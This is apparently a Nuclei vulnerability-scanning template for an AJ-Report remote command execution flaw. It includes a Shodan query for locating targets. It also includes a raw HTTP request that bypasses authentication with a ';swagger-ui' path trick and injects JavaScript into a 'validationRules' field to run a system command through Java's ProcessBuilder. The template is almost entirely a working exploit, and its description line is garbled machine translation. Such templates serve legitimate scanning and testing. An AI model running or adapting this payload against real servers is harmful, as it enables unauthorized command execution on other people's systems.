id: AJ-Report_verification_swagger-ui_RCE

info:
  name: AJ-Report_verification_swagger-ui_RCE
  author: HK
  severity: high
  description: Aggie Repotter's open source data screen, Virification; Swagger-Choi remote command execution
  metadata:
    max-request: 1
    shodan-query: title="AJ-Report"
    verified: true

http:
- raw:
  - |+
    @timeout: 30s
    POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9
    Content-Type: application/json;charset=UTF-8
    Connection: close
    Content-Length: 345


    {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

  max-redirects: 3
  matchers-condition: and
  matchers:
    - type: word
      part: body
      words:
        - 操作成功